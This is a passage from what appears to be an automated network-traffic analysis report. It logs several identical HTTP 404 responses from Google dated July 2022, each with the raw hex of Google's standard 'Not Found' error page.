31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:58:08 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:58:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:58:12 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:58:13 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:58:15 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:58:16 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Sat, 16 Jul 2022 21:58:17 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 